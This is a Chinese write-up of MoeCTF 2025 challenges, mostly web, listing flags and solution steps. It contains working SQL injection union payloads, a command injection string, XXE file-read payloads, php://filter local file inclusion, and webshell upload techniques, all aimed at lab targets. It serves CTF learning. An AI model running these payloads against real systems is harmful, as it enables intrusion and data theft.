MoeCTF 2025

Jatopos2025-10-232025-10-23

从此开始

签到

就在提示里

moectf{Welcome_to_MoeCTF_2025}

misc

Misc入门指北

web

0 Web入门指北

jother解码即可

moectf{jv@vScr1p7_14_so0o0o0o_inT3r3&t!!!}

01 第一章神秘的手镯

调试器里直接看js代码就可以拿到

moectf{f_i2_1s_Your_g00d_fri3nd!!}

02 第二章初识金曦玄轨

抓包可以找到下一关的位置

访问后没什么东西

抓包后就能拿到flag，在http头里

03 第三章问剑石！篡天改命！

在控制台执行以下脚本

先等级提升至 S 级，然后特殊表现值匹配{manifestation: “flowing_azure_clouds”}

async function getFlag() {
    const params = [
        {manifestation: "none"},
        {manifestation: "flowing_azure_clouds"},  // 最可能触发
        {manifestation: "flag"}
    ];
    
    for (const body of params) {
        try {
            const response = await fetch('/test_talent?level=S', {  // 尝试提升等级
                method: 'POST',
                headers: {'Content-Type': 'application/json'},
                body: JSON.stringify(body)
            });
            const data = await response.json();
            
            if (data.flag) {
                alert(`✨ 成功获取 FLAG: ${data.flag}`);
                return;
            }
        } catch (error) {
            console.log(`参数 ${JSON.stringify(body)} 请求失败`, error);
        }
    }
    alert("未找到 flag，请尝试其他参数");
}

// 执行函数
getFlag();

moectf{g3t-poSt-tRAnsm1s5lOn_15-@_GOOD_M3th0D!l!8d}

04 第四章金曦破禁与七绝傀儡阵

第一关，get传参

拿到碎片 bW9lY3Rme0Mw

第二关，post传参，拿到碎片 bjZyNDd1MTQ3

第三关改x-forwarded-for即可，拿到碎片 MTBuNV95MHVy

第四关，改user-agent即可，拿到碎片 X2g3N1BfbDN2

第五关是改cookie，拿到碎片 M2xfMTVfcjM0

第六关改referer即可，拿到碎片 bGx5X2gxOWgh

第七关要求发送put请求，用bp发包即可，拿到碎片 fQ==

base64解码即可

moectf{C0n6r47u14710n5_y0ur_h77P_l3v3l_15_r34lly_h19h!}

05 第五章打上门来！

moectf{A11_inPUT_is-mAlIcIOus93c42501}

06 第六章藏经禁制？玄机初探！

万能密码直接秒了…

moectf{w3IcOmE-TO_SQl_inJECtiOn11141644f0}

07 第七章灵蛛探穴与阴阳双生符

提示查看robots.txt

访问flag.php，发现是一道简单的md5绕过

科学计数法绕过即可

moectf{MD5-1s-Not-s@f3l129a7acc1584}

08 第八章天衍真言，星图显圣

先通过万能密码登录获取有效用户名

?username=’ or 1=1 –&password=’ or 1=1 –

单引号闭合，先判断列数

?username=admin’ group by 2–+&password=1

获得数据库名，这里只有第一位可以回显

?username=0’ union select database(),2–+&password=1

拿表名

?username=0’ union select group_concat(table_name),2 from information_schema.tables where table_schema=database()–+&password=1

拿列名

?username=0’ union select group_concat(column_name),2 from information_schema.columns where table_schema=database() and table_name=’flag’–+&password=1

拿flag

?username=0’ union select value,2 from flag–+&password=1

moectf{un10n-64s3d-sqLl_FtW1!5b7d9763}

Moe笑传之猜猜爆

直接在控制台运行以下脚本

// 直接读取当前的正确答案
console.log("正确答案是:", randomNumber);

// 把正确答案填入输入框
guessField.value = randomNumber;

// 调用原来的猜测函数
checkGuess();

09 第九章星墟禁制·天机问路

先用 dnslog.cn 测试有没有DNS请求发出去

测试后发现后端并没有真的发起 DNS 请求到公网，可以通过命令拼接实现命令注入

www.baidu.com;ls /

查目录，没有发现flag，猜测可能在环境里面

www.baidu.com;env

得到flag

10 第十章天机符阵

阅读前端代码，以下是关键部分

<form method="POST" action="chapter10.php" class="matrix-form" id="matrix-form">
    <textarea id="contract" name="contract" class="contract-input" required></textarea>
    <button type="submit" class="submit-btn">发动符阵</button>
</form>

有一个输入框，随意输入内容后会输出以下报错

<br />
<b>Warning</b>:  DOMDocument::loadXML(): Start tag expected, '&lt;' not found in Entity, line: 1 in <b>/var/www/html/chapter10.php</b> on line <b>17</b><br />
<阵枢>引魂玉</阵枢>
<解析>未定义</解析>
<输出>未定义</输出>

可以看出为xxe漏洞，提示flag在flag.txt

1.利用外部实体读取文件

<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/flag.txt">

2.将实体嵌入 <解析> 或 <输出> 节点

<解析>&xxe;</解析>

payload如下

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/flag.txt">
]>
<data>
  <阵枢>引魂玉</阵枢>
  <解析>&xxe;</解析>
  <输出>未定义</输出>
</data>

输出

解码

10 第十章天机符阵_revenge

解决方法同上一题，但是flag.txt的位置改到了根目录

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt">
]>
<data>
  <阵枢>引魂玉</阵枢>
  <解析>&xxe;</解析>
  <输出>未定义</输出>
</data>

11 第十一章千机变·破妄之眼

python脚本如下

from itertools import permutations
import requests
import time

# ---------------- 配置 ----------------
TARGET_URL = "http://127.0.0.1:53276/"  # 替换为实际 URL
LETTERS = 'mnopq'                         # 参数名字母
DELAY = 1                                 # 每轮请求延迟（秒）
FAIL_PAGE_KEYWORD = '十万八千虚门，唯有一实门可通阵眼'  # 失败页面特征
# -------------------------------------

# 生成 120 种排列组合
perms = [''.join(p) for p in permutations(LETTERS)]

def try_all_params():
    for p in perms:
        params = {p: p}
        try:
            response = requests.get(TARGET_URL, params=params, timeout=5)
            # 如果页面不再包含失败页面特征，说明成功
            if FAIL_PAGE_KEYWORD not in response.text:
                print(f"[+] 找到当前参数名: {p}")
                return response.text  # 返回成功页面内容
        except requests.RequestException as e:
            print(f"[!] 请求失败: {e}")
    return None

if __name__ == "__main__":
    print("[*] 开始轮询参数名...")
    while True:
        success_page = try_all_params()
        if success_page:
            print("[+] 成功访问页面，内容如下：\n")
            print(success_page)
            break
        print(f"[*] 本轮未找到参数名，等待 {DELAY}s 后重试...")
        time.sleep(DELAY)

回显如下

C:\Python\Python312\python3.exe D:\Code\Python\tese.py 
[*] 开始轮询参数名...
[+] 找到当前参数名: nmpqo
[+] 成功访问页面，内容如下：

<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>金曦玄轨·破界之眼 - 玄天剑宗秘宝</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <style>
        :root {
            --gold-primary: #d4af37;
            --gold-secondary: #f9e076;
            --gold-tertiary: #b8860b;
            --deep-blue: #0a192f;
            --dark-bg: #0d1b2a;
            --scrollbar: #2c3e50;
            --text-light: #e0e1dd;
            --text-gold: #ffd700;
            --danger: #e63946;
            --success: #2a9d8f;
            --folder-color: #4ec9b0;
            --file-color: #64b5f6;
        }
        
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            background: linear-gradient(135deg, var(--dark-bg) 0%, #1b263b 100%);
            color: var(--text-light);
            font-family: 'Segoe UI', 'Microsoft YaHei', sans-serif;
            line-height: 1.6;
            min-height: 100vh;
            padding: 20px;
            position: relative;
            overflow-x: hidden;
        }
        
        body::before {
            content: "";
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: 
                radial-gradient(circle at 10% 20%, rgba(212, 175, 55, 0.1) 0%, transparent 20%),
                radial-gradient(circle at 90% 80%, rgba(212, 175, 55, 0.1) 0%, transparent 20%),
                url("data:image/svg+xml,%3Csvg width='100' height='100' viewBox='0 0 100 100' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath d='M11 18c3.866 0 7-3.134 7-7s-3.134-7-7-7-7 3.134-7 7 3.134 7 7 7zm48 25c3.866 0 7-3.134 7-7s-3.134-7-7-7-7 3.134-7 7 3.134 7 7 7zm-43-7c1.657 0 3-1.343 3-3s-1.343-3-3-3-3 1.343-3 3 1.343 3 3 3zm63 31c1.657 0 3-1.343 3-3s-1.343-3-3-3-3 1.343-3 3 1.343 3 3 3zM34 90c1.657 0 3-1.343 3-3s-1.343-3-3-3-3 1.343-3 3 1.343 3 3 3zm56-76c1.657 0 3-1.343 3-3s-1.343-3-3-3-3 1.343-3 3 1.343 3 3 3zM12 86c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm28-65c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm23-11c2.76 0 5-2.24 5-5s-2.24-5-5-5-5 2.24-5 5 2.24 5 5 5zm-6 60c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm29 22c2.76 0 5-2.24 5-5s-2.24-5-5-5-5 2.24-5 5 2.24 5 5 5zM32 63c2.76 0 5-2.24 5-5s-2.24-5-5-5-5 2.24-5 5 2.24 5 5 5zm57-13c2.76 0 5-2.24 5-5s-2.24-5-5-5-5 2.24-5 5 2.24 5 5 5zm-9-21c1.105 0 2-.895 2-2s-.895-2-2-2-2 .895-2 2 .895 2 2 2zM60 91c1.105 0 2-.895 2-2s-.895-2-2-2-2 .895-2 2 .895 2 2 2zM35 41c1.105 0 2-.895 2-2s-.895-2-2-2-2 .895-2 2 .895 2 2 2zM12 60c1.105 0 2-.895 2-2s-.895-2-2-2-2 .895-2 2 .895 2 2 2z' fill='%23d4af37' fill-opacity='0.1' fill-rule='evenodd'/%3E%3C/svg%3E");
            opacity: 0.2;
            z-index: -1;
        }
        
        .container {
            max-width: 1200px;
            margin: 0 auto;
            background: rgba(13, 27, 42, 0.85);
            border-radius: 15px;
            box-shadow: 0 10px 30px rgba(0, 0, 0, 0.5);
            border: 1px solid rgba(212, 175, 55, 0.3);
            overflow: hidden;
            position: relative;
            z-index: 1;
        }
        
        .header {
            background: linear-gradient(90deg, var(--deep-blue) 0%, rgba(10, 25, 47, 0.8) 100%);
            padding: 25px 30px;
            border-bottom: 2px solid var(--gold-primary);
            position: relative;
            overflow: hidden;
        }
        
        .title-container {
            display: flex;
            align-items: center;
            gap: 15px;
        }
        
        .title-icon {
            font-size: 2.5rem;
            color: var(--gold-secondary);
            background: rgba(0, 0, 0, 0.3);
            width: 70px;
            height: 70px;
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            border: 2px solid var(--gold-primary);
        }
        
        .title-text {
            font-size: 2.2rem;
            background: linear-gradient(to right, var(--gold-secondary), var(--gold-primary));
            -webkit-background-clip: text;
            background-clip: text;
            -webkit-text-fill-color: transparent;
            text-shadow: 0 0 10px rgba(212, 175, 55, 0.3);
            letter-spacing: 1px;
        }
        
        .title-subtext {
            margin-top: 8px;
            font-size: 1.1rem;
            color: rgba(224, 225, 221, 0.7);
            max-width: 800px;
            line-height: 1.7;
        }
        
        .content {
            padding: 30px;
        }
        
        .form-container {
            background: rgba(26, 39, 59, 0.6);
            border-radius: 10px;
            padding: 25px;
            margin-bottom: 30px;
            border: 1px solid rgba(212, 175, 55, 0.2);
            box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3);
        }
        
        .form-title {
            font-size: 1.4rem;
            color: var(--gold-secondary);
            margin-bottom: 20px;
            display: flex;
            align-items: center;
            gap: 10px;
        }
        
        .form-title i {
            color: var(--gold-primary);
        }
        
        .form-group {
            display: flex;
            gap: 15px;
            flex-wrap: wrap;
            align-items: center;
        }
        
        .path-label {
            font-size: 1.1rem;
            color: var(--text-light);
            white-space: nowrap;
        }
        
        .path-input {
            flex: 1;
            min-width: 300px;
            padding: 14px 18px;
            background: rgba(10, 25, 47, 0.7);
            border: 1px solid rgba(212, 175, 55, 0.4);
            border-radius: 8px;
            color: var(--text-light);
            font-size: 1.1rem;
            transition: all 0.3s ease;
            box-shadow: 0 0 10px rgba(212, 175, 55, 0.1);
        }
        
        .path-input:focus {
            outline: none;
            border-color: var(--gold-primary);
            box-shadow: 0 0 15px rgba(212, 175, 55, 0.3);
        }
        
        .submit-btn {
            background: linear-gradient(135deg, var(--gold-tertiary), var(--gold-primary));
            color: var(--deep-blue);
            border: none;
            padding: 14px 30px;
            border-radius: 8px;
            font-size: 1.1rem;
            font-weight: 600;
            cursor: pointer;
            transition: all 0.3s ease;
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.3);
            display: flex;
            align-items: center;
            gap: 8px;
        }
        
        .submit-btn:hover {
            transform: translateY(-2px);
            box-shadow: 0 6px 15px rgba(212, 175, 55, 0.4);
        }
        
        .submit-btn:active {
            transform: translateY(1px);
        }
        
        .result-container {
            margin-top: 20px;
        }
        
        .result-title {
            font-size: 1.3rem;
            color: var(--gold-secondary);
            margin: 25px 0 15px;
            padding-bottom: 10px;
            border-bottom: 1px solid rgba(212, 175, 55, 0.3);
            display: flex;
            align-items: center;
            gap: 10px;
        }
        
        .table-container {
            overflow-x: auto;
            border-radius: 8px;
            border: 1px solid rgba(212, 175, 55, 0.3);
            box-shadow: 0 5px 15px rgba(0, 0, 0, 0.2);
            margin-bottom: 30px;
        }
        
        .file-table {
            width: 100%;
            border-collapse: collapse;
            background: rgba(15, 30, 46, 0.7);
        }
        
        .file-table th {
            background: linear-gradient(to right, rgba(10, 25, 47, 0.9), rgba(26, 39, 59, 0.9));
            color: var(--gold-secondary);
            padding: 15px 20px;
            text-align: left;
            font-weight: 600;
            border-bottom: 2px solid var(--gold-primary);
        }
        
        .file-table td {
            padding: 12px 20px;
            border-bottom: 1px solid rgba(212, 175, 55, 0.1);
        }
        
        .file-table tr:hover {
            background: rgba(212, 175, 55, 0.1);
        }
        
        .file-table tr:last-child td {
            border-bottom: none;
        }
        
        .folder-cell {
            color: var(--folder-color);
            cursor: pointer;
        }
        
        .folder-cell:hover {
            text-decoration: underline;
            color: var(--gold-secondary);
        }
        
        .folder-cell i {
            margin-right: 8px;
        }
        
        .file-cell {
            color: var(--file-color);
            cursor: pointer;
        }
        
        .file-cell:hover {
            color: var(--gold-secondary);
        }
        
        .file-cell i {
            margin-right: 8px;
        }
        
        .file-content {
            background: rgba(15, 30, 46, 0.7);
            border-radius: 8px;
            padding: 25px;
            border: 1px solid rgba(212, 175, 55, 0.3);
            font-family: 'Courier New', monospace;
            white-space: pre-wrap;
            word-break: break-all;
            line-height: 1.8;
            max-height: 500px;
            overflow-y: auto;
            box-shadow: inset 0 0 15px rgba(0, 0, 0, 0.4);
            color: #a9b7c6;
        }
        
        .file-content h3 {
            color: var(--gold-secondary);
            margin-bottom: 15px;
            border-bottom: 1px solid rgba(212, 175, 55, 0.3);
            padding-bottom: 10px;
        }
        
        .file-content h4 {
            color: var(--folder-color);
            margin: 15px 0 10px;
        }
        
        .error-message {
            background: rgba(230, 57, 70, 0.15);
            border: 1px solid var(--danger);
            border-radius: 8px;
            padding: 20px;
            color: #ff6b6b;
            font-size: 1.1rem;
            display: flex;
            align-items: center;
            gap: 15px;
            margin: 20px 0;
        }
        
        .current-path {
            background: rgba(26, 39, 59, 0.6);
            border-radius: 8px;
            padding: 12px 20px;
            margin-bottom: 20px;
            font-family: monospace;
            color: var(--gold-secondary);
            border: 1px solid rgba(212, 175, 55, 0.2);
        }
        
        .footer {
            text-align: center;
            padding: 25px;
            color: rgba(224, 225, 221, 0.6);
            border-top: 1px solid rgba(212, 175, 55, 0.2);
            font-size: 0.9rem;
        }
        
        .footer a {
            color: var(--gold-secondary);
            text-decoration: none;
        }
        
        .footer a:hover {
            text-decoration: underline;
        }
        
        /* Scrollbar styling */
        ::-webkit-scrollbar {
            width: 10px;
            height: 10px;
        }
        
        ::-webkit-scrollbar-track {
            background: rgba(15, 30, 46, 0.5);
            border-radius: 5px;
        }
        
        ::-webkit-scrollbar-thumb {
            background: linear-gradient(to bottom, var(--gold-tertiary), var(--gold-primary));
            border-radius: 5px;
        }
        
        ::-webkit-scrollbar-thumb:hover {
            background: var(--gold-primary);
        }
        
        /* 动画效果 */
        @keyframes fadeIn {
            from { opacity: 0; transform: translateY(20px); }
            to { opacity: 1; transform: translateY(0); }
        }
        
        .form-container, .result-container {
            animation: fadeIn 0.6s ease-out;
        }
        
        @keyframes pulse {
            0% { box-shadow: 0 0 0 0 rgba(212, 175, 55, 0.4); }
            70% { box-shadow: 0 0 0 10px rgba(212, 175, 55, 0); }
            100% { box-shadow: 0 0 0 0 rgba(212, 175, 55, 0); }
        }
        
        .pulse {
            animation: pulse 2s infinite;
        }
        
        /* 响应式设计 */
        @media (max-width: 768px) {
            .header {
                padding: 20px;
            }
            
            .title-container {
                flex-direction: column;
                text-align: center;
            }
            
            .title-icon {
                margin-bottom: 15px;
            }
            
            .form-group {
                flex-direction: column;
                align-items: stretch;
            }
            
            .path-input {
                min-width: 100%;
            }
            
            .file-table {
                font-size: 0.9rem;
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <div class="title-container">
                <div class="title-icon">
                    <i class="fas fa-dragon"></i>
                </div>
                <div>
                    <h1 class="title-text">金曦玄轨·破界之眼</h1>
                    <p class="title-subtext">以金曦玄轨之力窥探天地本源，破除万法禁制。此乃天衍秘术与金曦破禁术结合之无上法器，可洞悉信标迷宫，溯源归墟之径。</p>
                </div>
            </div>
        </div>
        
        <div class="content">
            <div class="form-container">
                <h2 class="form-title"><i class="fas fa-search"></i> 玄轨探查</h2>
                <form method="GET">
                    <div class="form-group">
                        <label class="path-label">信标路径：</label>
                        <input type="text" name="file" class="path-input" value="./" placeholder="输入信标路径或玉简名称..." id="pathInput">
                        <button type="submit" class="submit-btn pulse">
                            <i class="fas fa-eye"></i> 窥探本源
                        </button>
                    </div>
                </form>
            </div>
            
            <div class="result-container">
                                                            <div class="current-path">
                            <i class="fas fa-folder-open"></i> 当前路径: ./                        </div>
                        
                        <h3 class="result-title"><i class="fas fa-folder-open"></i> 信标空间</h3>
                        
                        <div class="table-container">
                            <table class="file-table">
                                <thead>
                                    <tr>
                                        <th>玉简名称</th>
                                        <th>玄轨类型</th>
                                    </tr>
                                </thead>
                                <tbody>
                                    <!-- 上级目录链接 -->
                                    
                                    <!-- 实际文件系统中的内容 -->
                                                                            <tr>
                                            <td class="file-cell" onclick="viewFile('./find.php')">
                                                <i class="fas fa-file"></i> find.php                                            </td>
                                            <td>玄轨玉简</td>
                                        </tr>
                                                                                                                <tr>
                                            <td class="file-cell" onclick="viewFile('./flag.php')">
                                                <i class="fas fa-file"></i> flag.php                                            </td>
                                            <td>玄轨玉简</td>
                                        </tr>
                                                                                                                <tr>
                                            <td class="file-cell" onclick="viewFile('./index.php')">
                                                <i class="fas fa-file"></i> index.php                                            </td>
                                            <td>玄轨玉简</td>
                                        </tr>
                                                                                                        </tbody>
                            </table>
                        </div>
                                                </div>
        </div>
        
        <div class="footer">
            <p>玄天剑宗 · 织云阁 · 金曦破禁术传承 | 当前使用者：HDdss</p>
            <p>金曦玄轨乃宗门秘传，擅用者需持长老令牌。泄露宗门秘法者，废去修为，打入寒铁矿洞！</p>
        </div>
    </div>

    <script>
        // 添加交互功能
        document.addEventListener('DOMContentLoaded', function() {
            const pathInput = document.getElementById('pathInput');
            const submitBtn = document.querySelector('.submit-btn');
            
            // 按钮点击效果
            submitBtn.addEventListener('click', function() {
                this.classList.remove('pulse');
                void this.offsetWidth;
                this.classList.add('pulse');
            });
            
            // 输入框提示
            pathInput.addEventListener('focus', function() {
                this.style.boxShadow = '0 0 15px rgba(212, 175, 55, 0.3)';
            });
            
            pathInput.addEventListener('blur', function() {
                this.style.boxShadow = '0 0 10px rgba(212, 175, 55, 0.1)';
            });
            
            // 随机生成玄轨路径的提示
            const pathExamples = [
                './天衍符箓_基础篇.lst',
                './周天星算_入门禁制.fld',
                './金曦玄轨感应篇.txt',
                './七绝傀儡阵_破阵要诀.md',
                './五行遁甲_防护阵图.sec'
            ];
            
            let exampleIndex = 0;
            setInterval(() => {
                pathInput.placeholder = `输入信标路径或玉简名称，如：${pathExamples[exampleIndex]}`;
                exampleIndex = (exampleIndex + 1) % pathExamples.length;
            }, 3000);
        });
        
        // 导航函数
        function navigateTo(path) {
            const form = document.createElement('form');
            form.method = 'GET';
            form.action = '';
            
            const input = document.createElement('input');
            input.type = 'hidden';
            input.name = 'file';
            input.value = path;
            
            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
        }
        
        // 查看文件函数
        function viewFile(filePath) {
            const form = document.createElement('form');
            form.method = 'GET';
            form.action = '';
            
            const input = document.createElement('input');
            input.type = 'hidden';
            input.name = 'file';
            input.value = filePath;
            
            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
        }
    </script>
</body>
</html>

进程已结束，退出代码为 0

访问find.php，发现是一个文件包含，但是直接包含flag.php看不到flag

这里用php://filter协议进行base64加密即可

php://filter/convert.base64-encode/resource=flag.php

拿到flag

12 第十二章玉魄玄关·破妄

用蚁剑连接但是没找到flag，这里直接命令执行查看环境

13 第十三章通幽关·灵纹诡影

这关是文件上传，后端有对文件标识的检验，前端可以用抓包绕过jpg

010修改文件标识

上传后用bp抓包改后缀，蚁剑连接拿到flag

14 第十四章御神关·补天玉碑

本题考察 .htaccess

上传 .htaccess 再上传含有木马的jpg文件即可解析，蚁剑连接

摸金偶遇FLAG，拼尽全力难战胜

// 获取挑战数据
fetch('/get_challenge?count=9')
  .then(response => response.json())
  .then(data => {
    const numbers = data.numbers;
    const token = data.token;
    console.log('获取挑战成功:', numbers, token);

    // 验证答案
    return fetch('/verify', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json'
      },
      body: JSON.stringify({ answers: numbers, token: token })
    });
  })
  .then(response => response.json())
  .then(data => {
    if (data.correct) {
      console.log('FLAG:', data.flag);
      alert('FLAG: ' + data.flag); // 弹出提示框显示FLAG
    } else {
      console.error('验证失败:', data.message);
    }
  })
  .catch(error => console.error('请求错误:', error));

01 第一章神秘的手镯_revenge

题目提示有备份，一般备份文件的后缀名为 .bak 或 .backup 或 .swp

成功拿到备份

脚本如下，需要提交万言咒五百次，且不能复制粘贴

// 获取 textarea 和按钮元素
var textarea = document.getElementById('passwordInput');
var button = document.getElementById('unsealButton');

// 这里填入你的万言咒
var mySpell = 'XqRqsDZWVYjoXvSwMYGklZOGwVpnmPKTPJXhTiFKvhvcseSrXEbawElbdYmJRydaISVcmpLTscDEPSlbIkUNKEvdzivnsrfSCnGolKgQOmVFhxKxhMitBzNeBHNyOgwckpBKdMveKRzqTIrcnvhVgXoxZrjKmuFkFahmHtmTSCKjnjethRbwMPKeJbyLSPAzROgVTuNIChkunCQdCLnoEJWzTscdjGHYzuHJZPMbxqtWteSbkogopAGBxprYdnZEGjfhJfYKlVlVarMHKwlHcIpsHwXgcsvWVKijiTYiQTfpIMHfqyroLmSqLgugtVlDQXeaGTxSWCfkMsMxnucRAxvKeRkUkpnfLrAtMfnBpgwbgLSHsXEPcUxuJwcdxYEfispMnEluMGWPtiKWukWJmcixVbTrgBhRmSqeMWZorscrwsxerZnmKRmbcBIukPQIHOxeoPOXnbngPGdpFrnoDAhCkuQeyDreHKQIutGOwDmQrtuFZYZwPlDMuBZPqPcIDrSHUZvGQKDLARkVfmEQdLeBSVoRAOUJZXAiafPXCMigwuNPzElbajcHnpzBfUvxhDTFvdRsbnvdaYDmyjkNLqrFbRqspCJxrFAJaZkEisEaWkgvnTPTCZvPStbzuAVJRJqcnthlUXbigHdyMERTwFmhGktdbvyHxMWZkIhkMhDUHcrnrqezOsoaZLvifeiFLBUlHJEhtHoStqBtQRenMJPVWLzoFCtBlVSlUaQKnXCedKVGocnoWJiOfnpXVPOxAXQITpeXgfdmszXzOTEdTjqnEPAbQcOfRQFnZPNeygovEvmlhZfKNHQeRcnjHweNceHuFBTciWcFSQNZmIlnpiMkqiQyZOENdGFayRLHRuAHYcFOeZoaWsVwciPUtHRdNxfBtENIVDTPzqnBPdtRdOVWKEaInMAmgTUFSrdghOVOefjxtitiabICQNdLUItQILjyAhCBvnTmzHALWouisBfvTGtHjcYShuKdejEobmfYOypmQRJiKeUAyIGcKPsLDYOVAdIUgujXMsDsOLyrkCqjVAwkJnymwVcIGQPXixGWZWpychnsCINBItKqzcmhoYLWhadHoihjWVBlFgpHKfXpOjXYdhBLjfZUFICrlIEJeDztXIhnMsRITfNhFSjfsQwEktpzryjKvoedbAgFGnIshgIwyJANiKQJzdPdZkckQPVXYAKfekJvIwlQTZOwhjepNEJGhyahbEuNPtkCXVaNVkUvQHRAQVXtAQGTBUlWpZwfuFjKwvjNfzkCmcVeCPUCRSDXKSKQjNOkmeYabmjtNVYclVEredbjBiqXWeMCXaXPltDgneMPJaGIYHyfbWqNLwJCqPsdJxCDvaIuYXDHVLfwPwQuvUGcXvJZmcyACILNBDHnGKXFnUpExHTHrcgyIKCDSzeUsyOYfxnKyAmsUPgWgfdcJuLGAPnLvLnFuKXNUThohGpagqOIucLUtSHYBJvlPzLnJXtBIryPDyWtZuvOcoLBUkWapklHXLNQDonMyunmuoAuqkvdCvWXvIrdXZtHrgwsDuZiytotfKBAMwNGiVDZGlMzPKGpIeFzCLuXYsVXQZfYXoPuBNJyEFNvhlnzDbAieaNycIwKCtysQxbjejrEJVzuaNWpKqaduNtdmAjFpQFKFkoukCGsoscynKmpOTRhBlKlcurfCSzckDmrABkvUnTJBGBjKQeVEZRpfcdNbqEJAGfeaMtKiqfKcmhjngjEuVQaDmgYOdRxGOBGIRBgNCwsUAqNhVxzPkVSkNRLuVbAEApwnXjeipSbNDROtZSuPItgRUIJGcDiSxJwgcqximjKfskPXuHbhowALsYRPrjrteNPhiUKQpFgYlRBHJMuOQPtIYcIPIFHTpwMVpRwRvjpDKzlKmuXZVHAvswCIGoHxMahgaueHzkQhrGXdiXZswbkbpsOFOskXcgBUXBTjXacDJzbqFYhMpQXykStZCMJpmzkBfygwmQERoDIyMCGiJiCmOyTmrepOZIxfPlONsapLxOACdcfxLxsMLUsMziTpqcxAOpFMvghzFYRSwMQmGLDiaQsTZAZurHBSuaFHmXQohjUSqicRyHfrtIKygKBsCdXWTDgzcvHYGnbghSlMeHiMHQZtFoyPoVxyPNgnUxgiXZpXWokTBfnuXLDxqkyBnXWlIwFODufTCoevNmvHKZFAhPNOfuJxnqyfigeihgefMyPRGtjTwPxgkFGleTQOczfIhKVOSAwkfYLzesAxSHaqsWUfdRIxVmgsdedlnRFKHbRIMUHcRELhMLcpGiAJmqmQKECsfpXUvtBcrzRQcORBDNPVlQjdsHZXaHNOhQbdigsdszLIHPnXzqbKhBchruNLjBlaydvIHTVmSlyHtIyCyFocdRlJTozqSQNAvQySRZpNqUPzpQuKWLxUPbhYjvGlEpLWnPenWboqEfEMsAIxdbJQMKfNXakvwtRsTyHMSPOLIGxhLCiEnBnkJLFiDrkLkqBeRqxatdzFjaOVwhEKLAWxHViZadRjfQfoPOnuXPIFLPBnAleremNPcnTwAjgZADfYxlDrtcoQFGubCdTYPFSqXPjOUeAGFuwRvpeQWowxajsTnMcOfPtYBKqJwUQTislZbOsMyBpFCQaQYjSKyxGcSyceUGvtOhxImvTmiMfsmejhFAVALTvdRGAInBuxibmSYloasOJIntRlxjWeQGVklDfBGUkrAfvtNXRVBOvltzigxMUmEIhIjIgwYDWhCUAgQImixmgXDYQHUPRdfNGerNueMivayPSNRheVPTVhPaHDvFPcedCpRGOcAXLBrPnKlyHjDueOZdpfZKabnbdvYilMSALQHjVfkDjXVgsvIyNZEcfobkydwZPfKqTCXgPkPdgVaBmJKIYNmGxStldrBjZAykFDMfoiFIRLGigwdRvilQdycSAuXShvACVReSOifjuWlOSbKhXjfPiYibMxwIOcYtqJDBsbzqsMpsUbnVOVNCBHCVwbaghdaZwKwOcWsFdTxICJWXrEgJKWVrtPLUnYehdKUIbHUxWvzflPvLJMIJdoPNcjlPyZuYbrNgznMPDQIskYGeKHEIxbsAzFGPSbHEYIfnakwrHtifynYQBGcIMtEfSTmzltyveQBEdyrPHurWSEPiEGaGFHNtYqFqZSvMOkfEkFGNUNehiTqrLJMZPmjBSlnkLaQtjTslRqwOSmxZdQzpgBzTFVxLtBnUspHSqUyBLXbRMViuwZnVFyEFEyzlISCdtwpnKanKdroLgotHdEhGyucMuGyqStCiZbxKIlMLvuhLTUNbmXYhZbfTrHGlYbMjsXAiQovPHQrfvEjkiZVgyhEVPRkTzyAucZgafPFGOBXcSkOXKdlZrZpXQOJCKLtzBysNKVkHEgyrQPqnUKXILyujGsFqXzfLpDjewEmzGrGhRCSumVlXrwoBXRljkWHGDUsNUAdZKUDOwejOZifSOHJHiKCYNGtbdQEPaFKPnaYQzfxzGefKtAbRuJoZmHblZmwKrODQVMUOqmIZOuxzraxWdtpcRHFZCJlTdMcQLFVuTlOQNCkEPkRTFPLVNAqImzvpsWcNMPIvulFEhoWSDXlwpeBZxKIZApQOArGWITaVteYWBoEkHlPjHkQwxDnRfDyRXqjbzVgYcTDsMafXLustotnGcrbNyDimSxCiatNVnKgnTuyUYJtUdSAgJwLeFSPuAIfvbaxYNwRgDoGtaQcFxgDJMFgpCIuoEdwDChkoBVfDkaihdmPQZTwGcyNiSHpXLZfrszPoroaFSFoyZVysuPgwQpEQWQYqwLmfSCktrnuAUktVGnDvspNePKtABerKUsrjhJZnBtEsiRwoGDYVoSxzhDbLWysDJUWECVbNDtZEPLawlSblaIPtIfLJxpaJQnXQgVKIuWDZLmAlWfzxGmxEjtpLBmJCsvCyMemqylTnRXgqCzhfROrdtdPcrHtntoGyKnqjigbEfkdykWKlwQruRiDIVequOEJbHXdQCMIQAMTDXLQTgcLqmQlStExIAKMlNSXuhnUgYwTlVrqpadpTAzvLsTcopFOraXmxqCGqDiZhyUcWdraLNaxYlDTdjVkjHaWLVNDKvrDotXPOdLwPKGHiTpWzghIyopFBMJPEjaQlNJhZHctpMgvUawLrLnyuTxCejCavTOgQBwDFOdIZeawkGNWmwUzFauLxsqimLVSnEWPZYRAKHwHIWjCrPjtXTCeaCkVlrjRzhEvlwmnmrjlPqioroJpZDvJXtpOtHmsQheWgUnuDqjLUjWSzgdmuHBiNGsexkrxW